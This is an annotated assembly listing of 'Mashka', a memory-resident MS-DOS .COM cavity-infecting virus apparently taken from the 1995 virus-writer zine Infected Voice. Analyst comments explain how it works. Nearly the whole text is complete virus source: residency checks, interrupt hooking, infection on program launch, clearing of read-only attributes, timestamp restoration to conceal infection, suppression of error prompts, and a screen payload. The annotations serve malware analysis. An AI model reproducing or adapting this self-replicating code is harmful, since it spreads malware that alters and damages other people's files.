;ÛßßßßßßßßßßßßßßßÛ ß ß ÛÛßÛÛßÛÛ
;Û STEALTH group Û° Û ÛßÜ Ûßß Üßß Üßß ßÛß Üßß ÛßÛ Ý Û ÜßÛ Û Üßß Üßß ÛÛ ßß ÛÛ
;Û presents Û° Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û ßÛßß ÛÛÛÛÛ ÛÛ
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ° Þ Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜ ÛÛÛÛÛÜÛÛ
; °°°°°°°°°°°°°°°°° JAN 1995
;
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
; ===========================================================================
; (Box-drawing banner above is mis-encoded in this copy; the original
; comments throughout the file are CP866 Russian rendered as Latin-1.)
; Virus "Mashka" — memory-resident .COM cavity infector for MS-DOS.
; Syntax is MASM/TASM (SEGMENT / ASSUME / PTR / OFFSET / 'dw ?'), not NASM
; as the listing label claims. Historical sample, kept for analysis only.
;
; Analyst summary (every item below is taken from the code in this file):
;  * Residency probe: INT 21h AX=E200h answers AL=22h when resident.
;  * Going resident: shrinks the host's MCB and PSP top-of-memory by the
;    body size + 21h paragraphs, copies itself there, hooks INT 21h and
;    INT 10h. The extra paragraphs hold a 200h-byte scratch buffer that is
;    used after 'virend' during infection.
;  * Trigger: INT 21h AH=4Bh (EXEC) of a file whose path ends in "OM".
;  * Infection: looks for a run of zero bytes at least the body's length,
;    writes the body into that cavity (file size unchanged), and replaces
;    bytes 0-3 of the file with E9 xx xx 'Q' (JMP to the body + marker).
;    The read-only attribute is cleared first; the file date/time is put
;    back afterwards with the seconds field zeroed.
;  * Payload: on INT 10h AX=0005h (CGA 320x200) draws a helicopter sprite
;    moving across the screen before passing the call on.
;  * INT 21h AX=E233h returns the resident segment and the offsets of the
;    saved host bytes and saved vectors (intended for disinfection).
;  * INT 24h is pointed at a handler that returns AL=0 during infection.
TITLE Virus Mashka ; original note: "by the way, the real name!"

seg_a segment para 'code'
assume cs:seg_a,ds:seg_a

org 100h
; Entry point of the virus body. In an infected host this runs at an
; arbitrary offset (the host's first bytes were replaced by a JMP here), so
; every data reference is made relative to BX = runtime offset of 'start'.
; Entry state assumed for a .COM program: CS=DS=ES=SS=PSP.
start:
        call $+3                        ; "good old call": pushes the address of the next instruction
        pop bx                          ; bx = runtime offset of this 'pop'
        push es                         ; keep the entry ES (PSP); restored before jumping to the host
        sub bx,3                        ; bx = runtime offset of 'start' (delta for all data refs)
        push bx
        mov ax,0e200h                   ; "traditional" are-we-resident probe: private INT 21h function
        int 21h
        cmp al,22h                      ; the resident copy answers AL=22h (see INT21entry)
        jnz res                         ; not resident yet: install
        jmp short nores                 ; already resident: just run the host

res:
        ; --- carve the body out of the top of the host's memory block ---
        mov ax,ds
        dec ax
        mov ds,ax                       ; ds = the host's MCB (one paragraph below the PSP)
        mov ax,word ptr ds:[3]          ; MCB size in paragraphs
        sub ax,(offset virend - offset start)/10h+1+20h ; shrink by body size + 21h paragraphs
        mov word ptr ds:[3],ax
        mov ax,ds
        inc ax
        mov ds,ax                       ; back to the PSP
        mov ax,word ptr ds:[2]          ; PSP+2: first segment beyond the program's memory
        sub ax,(offset virend - offset start)/10h+1+20h ; lower it by the same amount
        mov es,ax                       ; es = new home of the resident copy
        mov word ptr ds:[2],ax
        ; NOTE(review): no MCB header is written for the released region.
        ; By the arithmetic above es is exactly where DOS expects the next
        ; MCB of the chain, and the body's first bytes are copied there.
        ; Whether DOS tolerates this is not established by this file —
        ; verify on a real DOS before trusting the "memory hiding".
        mov cx,offset virend - offset start
        mov si,bx
        xor di,di
        push cs
        pop ds
        rep movsb                       ; copy the body cs:bx -> es:0
        push es
        pop ds                          ; ds = resident copy; offsets below are relative to it
        mov ax,3521h                    ; get the current INT 21h vector (returned in es:bx)
        int 21h
        mov word ptr ds:[offset int21e - offset start],bx
        mov word ptr ds:[offset int21e+2 - offset start],es ; operand of the far JMP at exitint21
        mov ax,2521h
        mov dx,offset int21entry - offset start
        int 21h                         ; hook INT 21h -> INT21entry (ds:dx = resident copy)
        mov ax,3510h
        int 21h
        mov word ptr ds:[offset int10e - offset start],bx
        mov word ptr ds:[offset int10e+2 - offset start],es ; operand of the far JMP at exitint10
        mov ax,2510h
        mov dx,offset int10entry - offset start
        int 21h                         ; hook INT 10h -> int10entry (helicopter payload)

nores:
        ; original comment: "if the virus is already in memory, all that is
        ; left is to rejoice" — hand control to the host
        pop bx                          ; bx = delta (runtime offset of 'start')

        ; put back the four original host bytes that the JMP + marker overwrote
        mov ax,word ptr cs:[bx + offset real - offset start]
        mov bx,word ptr cs:[bx + offset real - offset start + 2]
        push cs
        pop ds                          ; ds = PSP again
        mov word ptr cs:[100h],ax       ; restore bytes 100h-101h
        mov word ptr cs:[102h],bx       ; restore bytes 102h-103h
        mov ax,100h                     ; host entry point
        pop es                          ; es = value saved at entry
        push ax
        ret                             ; jump to cs:100h

; The host's original first four bytes, filled in at infection time and
; written out with the body. In a freshly assembled (uninfected) build they
; decode as 'mov ah,4Ch / int 21h', so the installer simply terminates.
real dw 4cb4h
dw 21cdh
; Resident INT 21h handler. Three private cases; everything else is chained
; to the original vector through the far JMP at exitint21.
INT21entry:
        cmp ax,0e200h                   ; residency probe (issued by 'start')
        jnz d01
        mov al,22h                      ; answer: "already here"
        iret
d01:
        cmp ax,0e233h                   ; "secret" function: report where things live so
                                        ; that any version can be disinfected / unhooked
        jnz d1
        mov al,22h
        mov bx,cs                       ; bx = segment of the resident copy
        mov cx,offset real - offset start   ; cx = offset of the saved host bytes
        mov dx,offset int21e - offset start ; dx = offset of the saved INT 21h vector
        mov si,offset int10e - offset start ; si = offset of the saved INT 10h vector
        iret
d1:
        cmp ah,4bh                      ; AH=4Bh (EXEC) is the only infection trigger
        jz in4b
        jmp exitint21                   ; anything else: pass to the original handler

; original comment: "this is where you usually land when doing INT 21h" —
; the EXEC intercept follows
; EXEC intercept: DS:DX = ASCIIZ path of the program about to be loaded.
; The original comment jokes that the four pushes below spell "PSQR"
; (50h 53h 51h 52h) in the binary.
in4b:
        push ax
        push bx
        push cx
        push dx

        push es
        push ds
        push si
        push di

        ; install a critical-error handler so that a failing disk/device access
        ; during infection produces no DOS "Abort, Retry, ..." prompt
        ; (original joke: "so files don't print on the printer that isn't there")
        push dx
        push ds
        push cs
        pop ds
        mov ax,2524h
        mov dx,offset int24entry - offset start
        int 21h                         ; hook INT 24h -> int24entry (ds:dx = resident copy)
        ; NOTE(review): nothing in this file restores INT 24h; the vector stays
        ; hooked for the calling process (DOS normally puts it back from the
        ; PSP at process termination — confirm for the target DOS version).
        pop ds
        pop dx

        call cmpnol                     ; bx -> terminating NUL of the path
        call cmpcom                     ; CF=0 if the name ends in "OM" (see cmpcom)
        jnc pr1                         ; treated as a .COM: infect
        jmp exit                        ; otherwise leave it alone
pr1:
        ; remember the victim's path (offset, segment) for the attribute calls
        mov word ptr cs:[offset adname - offset start],dx
        mov word ptr cs:[offset adname - offset start+2],ds
        call catt                       ; clear the read-only attribute
        mov ax,3d02h                    ; open read/write, DS:DX = path
        int 21h
        mov bx,ax                       ; bx = handle; CF (open failure) is not checked
        call gettime                    ; save the file date/time for puttime

        ; original comment: "this bit is pointless here, but that was long
        ; ago and untrue" — seek to end of file, result unused
        mov ax,4202h
        xor cx,cx
        xor dx,dx
        int 21h

        push ds
        push cs
        pop ds                          ; ds = resident copy (scratch buffer lives after 'virend')

        mov ax,4200h                    ; seek to offset 0; original comment: "CX:DX are still zero".
                                        ; NOTE(review): INT 21h/42h returns DX:AX = new position, so
                                        ; DX is only still zero for files under 64K
        int 21h

        mov ah,3fh
        mov dx,offset virend - offset start
        mov cx,4h
        int 21h                         ; read the first 4 bytes into the scratch buffer

        ; infection marker: byte 3 of an infected .COM is 'Q'
        cmp byte ptr ds:[offset virend - offset start + 3],'Q'
        jnz ok2
        pop ds
        jmp closeexit                   ; already infected: restore time, close, chain the EXEC
ok2:
        ; --- cavity search: read the file in 200h-byte chunks and look for a
        ; run of zero bytes at least as long as the body. si = length of the
        ; current zero run, carried across chunks. (The original comment
        ; quotes "777" zeros; the code compares against the assembled size.)
        xor si,si
        mov dx,0 - 200h                 ; chunk offset, pre-decremented so the loop starts at 0
p2:
        mov ax,4200h
        add dx,200h                     ; next chunk
        xor cx,cx
        int 21h                         ; seek; ax = low word of the new position (= dx)
        push ax                         ; keep this chunk's file offset
        mov ah,3fh
        mov dx,offset virend - offset start
        mov cx,200h
        int 21h                         ; read up to 200h bytes into the scratch buffer
        cmp ax,0
        jnz d3
        pop dx                          ; end of file, no cavity found: give up on this file
        jmp d2
d3:
        cmp ax,200h
        jz ok4
        add ax,offset virend - offset start
        mov di,ax
        mov word ptr ds:[di],0ffh       ; short read: plant a non-zero byte after the data so a
                                        ; zero run cannot extend past the end of the file
ok4:
        call scanspace                  ; si = zero-run length, di = end of the run in the buffer
        pop dx                          ; dx = this chunk's file offset
        cmp si,offset virend - offset start
        jc p2                           ; run shorter than the body: keep reading

        ; file offset of the start of the zero run:
        ;   chunk offset + (di - buffer base) - run length
        sub di,(offset virend - offset start)
        add dx,di
        sub dx,si
        push dx                         ; dx = cavity offset

        ; --- save the host's first 4 bytes into 'real' (written out with the body) ---
        mov ax,4200h
        xor cx,cx
        xor dx,dx
        int 21h                         ; seek to 0
        mov ah,3fh
        mov cx,4h
        mov dx,offset real - offset start
        int 21h
        mov ax,4200h
        xor cx,cx
        xor dx,dx
        int 21h                         ; seek to 0 again

        ; --- build the new header: JMP rel16 to the cavity + infection marker ---
        mov si,offset virend - offset start
        mov byte ptr ds:[si],0e9h       ; JMP near
        pop dx
        push dx
        sub dx,3                        ; rel16 = cavity offset - 3 (the JMP occupies 100h..102h)
        mov word ptr ds:[si+1],dx
        mov byte ptr ds:[si+3],'Q'      ; marker tested in pr1
        mov ah,40h
        mov cx,4h
        mov dx,offset virend - offset start
        int 21h                         ; write the 4 header bytes

        ; --- write the body into the cavity; file length is unchanged ---
        pop dx                          ; dx = cavity offset
        xor cx,cx
        mov ax,4200h
        int 21h
        mov ah,40h
        mov cx,offset virend - offset start
        xor dx,dx
        int 21h                         ; write ds:0..virend (the resident copy, including 'real')
d2:
        pop ds                          ; ds = caller's DS (pushed in pr1)
closeexit:
        call puttime                    ; put the saved date/time back on the file
        mov ah,3eh
        int 21h                         ; close the handle in bx (original: "the working day is over!")
exit:
        pop di
        pop si
        pop ds
        pop es
        pop dx
        pop cx
        pop bx
        pop ax
exitint21:
        db 0eah                         ; JMP FAR ptr16:16 — its operand is the saved vector below
int21e dw ?                             ; original INT 21h offset (filled in by 'start')
dw ?                                    ; original INT 21h segment
adname dw ?                             ; far pointer to the victim's path: offset ...
dw ?                                    ; ... and segment
; Critical-error (INT 24h) handler installed by in4b: returns AL=0 without
; any prompt. The original comment calls this "ABORT"; in the documented
; INT 24h return convention AL=0 is "ignore the error" (abort is 2) — in
; either case the user never sees the "Abort, Retry, ..." prompt.
int24entry:
        mov ax,0h
        iret
time dw ?                               ; saved file time (seconds field cleared, see gettime)
dw ?                                    ; saved file date
;------------------------------------- find the NUL at the end of the path
; In:  ds:dx = ASCIIZ path
; Out: bx = offset of the terminating NUL. The scan starts at dx+1, so an
;      empty string is not handled (it would run on to the next NUL).
; Clobbers: bx, flags
cmpnol:
        mov bx,dx
nol:
        inc bx
        cmp byte ptr ds:[bx],0h
        jnz nol
        ret
;------------------------------------- is it a .COM?
; In:  ds:bx = terminating NUL of the path (from cmpnol)
; Out: CF=0 if the two bytes before the NUL are "OM" (word 'MO' in MASM
;      order, stored little-endian), CF=1 otherwise.
; Only the last two characters are compared, case-sensitively: the "C" and
; the dot are not checked, so any path ending in "OM" (e.g. ".ROM") matches.
; 'clc' leaves ZF alone, so the 'jz' still sees the result of the 'cmp'.
; Clobbers: flags
cmpcom:
        cmp word ptr ds:[bx-2],'MO'
        clc
        jz exitcmpexe
        stc
exitcmpexe:
        ret
;--------------------------------------- clear the read-only attribute
; Uses the path saved in 'adname': gets the attributes (AX=4300h), clears
; bit 0 (read-only) and writes them back (AX=4301h). The original value is
; not kept anywhere, so the read-only bit is never restored after infection.
; Clobbers: ax, cx, flags (ds and dx are preserved)
catt:
        push ds
        push dx
        mov ax,4300h
        LDS dx,dword ptr cs:[offset adname - offset start] ; ds:dx = victim path
        int 21h
        and cl,11111110b                ; clear read-only; hidden/system/archive bits untouched
        mov ax,4301h
        int 21h
        pop dx
        pop ds
        ret
;--------------------------------------- read and save the file's date/time
; In:  bx = open file handle
; Out: 'time' = (time word, date word)
; Note: 'and cl,11100000b' zeroes the low 5 bits of the DOS time word (the
;       2-second field), so the timestamp puttime writes back is not
;       byte-exact — a zero seconds field on a .COM is a possible indicator.
; Clobbers: ax, cx, dx, flags
gettime:
        mov ax,5700h
        int 21h
        and cl,11100000b
        mov word ptr cs:[offset time - offset start],cx
        mov word ptr cs:[offset time - offset start+2],dx
        ret
;----------------------------------------- put the saved date/time back ;)
; In:  bx = open file handle; 'time' filled in by gettime
; Clobbers: ax, cx, dx, flags
puttime:
        mov ax,5701h
        mov cx,word ptr cs:[offset time - offset start]
        mov dx,word ptr cs:[offset time - offset start+2]
        int 21h
        ret
;------------------------------------------ count zero bytes in the chunk
; Scans the 200h-byte scratch buffer that starts at 'virend'.
; In:  si = zero-run length carried over from the previous chunk
; Out: si = length of the current zero run
;      di = offset of the first non-zero byte after a run that reached the
;           body size, or one past the buffer end if the run is still open.
;      A non-zero byte resets si to 0 unless the run is already long enough,
;      in which case the routine returns immediately.
; Clobbers: al, di, flags
scanspace:
        mov di,offset virend - offset start - 1
opsc:
        inc di
        cmp di,(offset virend - offset start) + 200h
        jnc exsc                        ; end of buffer
        mov al,ds:[di]
        cmp al,0
        jnz clscan
        inc si                          ; one more zero
        jmp opsc
exsc:
        ret
clscan:
        cmp si,offset virend - offset start
        jc ok3
        ret                             ; run is long enough: stop at this byte
ok3:
        xor si,si                       ; run too short: start over
        jmp opsc
; Resident INT 10h handler: only AX=0005h (set CGA 320x200 mode) is acted
; on; every other call is chained to the original vector.
int10entry:
        cmp ax,0005h
        jz svert                        ; mode 5 requested: run the helicopter payload
exitint10:
        db 0eah                         ; JMP FAR ptr16:16 — its operand is the saved vector below
int10e dw ?                             ; original INT 10h offset (filled in by 'start')
dw ?                                    ; original INT 10h segment
svert:
        cmp si,22h
        jz exitint10                    ; SI=22h marks the payload's own INT 10h call: pass it through

; original comment: "AND THIS IS THE HELICOPTER!" — payload: a sprite
; flying across a CGA 320x200 screen, drawn before the call is chained on
vert:
        push ds
        push ax
        push bx
        push cx
        push dx
        push si
        push di
        push bp
        push es

        push cs
        pop ds                          ; ds = resident copy (sprite data in 'berts')
        mov ax,0b800h
        mov es,ax                       ; es = CGA video memory
        mov si,22h                      ; "it's us" marker for the hooked INT 10h
        mov ax,5
        int 10h                         ; set mode 5 now so the sprite is visible
        mov cx,70                       ; cx = x position in bytes, also the frame counter
        mov dx,30                       ; dx = y position
bb:
        push cx
        mov cx,6000h
zlp:
        loop zlp                        ; busy-wait delay (CPU-speed dependent)
        pop cx

        call bert                       ; draw the sprite at (cx, dx)
        loop bb                         ; cx-1: one byte further left, 70 frames in total

        pop es
        pop bp
        pop di
        pop si
        pop dx
        pop cx
        pop bx
        pop ax
        pop ds
        jmp exitint10                   ; finally let the original handler set the requested mode
;------------------------
; Draw the 12-row x 6-byte sprite 'berts' into CGA memory.
; In:  es = B800h, ds = resident copy, cx = x (byte column), dx = row index
; Rows are written alternately to di and di+2000h (the CGA interleave), then
; di advances by 80 for the next pair — hence the +2000h / -(2000h-80) steps.
; Clobbers: bx, bp, flags (dx, cx, ax, si, di are saved and restored)
bert:
        push dx
        push cx
        push ax
        push si
        push di

        mov ax,dx
        mov bx,80
        mul bx                          ; ax = dx*80 (dx is clobbered by mul, restored below)
        add ax,cx
        mov di,ax                       ; di = destination of the first row
        mov bp,0                        ; bp = rows drawn so far
        mov si,offset berts - offset start
opbert:
        mov cx,6
        push di
        rep movsb                       ; row in the first bank
        pop di
        add di,2000h                    ; second bank
        inc bp
        cmp bp,12
        je exbert
        mov cx,6
        push di
        rep movsb                       ; row in the second bank
        pop di
        sub di,2000h-80                 ; back to the first bank, next row pair
        inc bp
        cmp bp,12
        je exbert
        jmp opbert
exbert:
        pop di
        pop si
        pop ax
        pop cx
        pop dx
        ret
;================================
; Sprite: 12 rows x 6 bytes of CGA pixel data, drawn by 'bert'.
; Original comment: "a helicopter, or in Ukrainian — a helicopter".
berts db 0,0,0,0,0,0
db 0,0,0,0,0,0
db 0,0,55h,40h,0,0
db 0,0,4,0,0,0
db 0,1,44h,0,0,0
db 0,15h,55h,0,4,0
db 0,50h,57h,55h,55h,0
db 0,15h,75h,55h,4,0
db 0,5,55h,0,0,0
db 0,0,10h,0,0,0
db 0,0,0,0,0,0
db 0,0,0,0,0,0
;=================================
; Original comment: "an encrypted message to descendants — use NEG".
; Unreferenced data carried inside the body (it counts towards the body
; size); the bytes are mis-encoded in this copy of the listing.
db '·‚“೟<C2B3>˜•Ÿàßß྇ཎŸ†‡àß'
virend:                                 ; end of the body; the 200h-byte scratch buffer used during
                                        ; infection starts here (covered by the extra paragraphs
                                        ; reserved in 'start')
seg_a ends
end start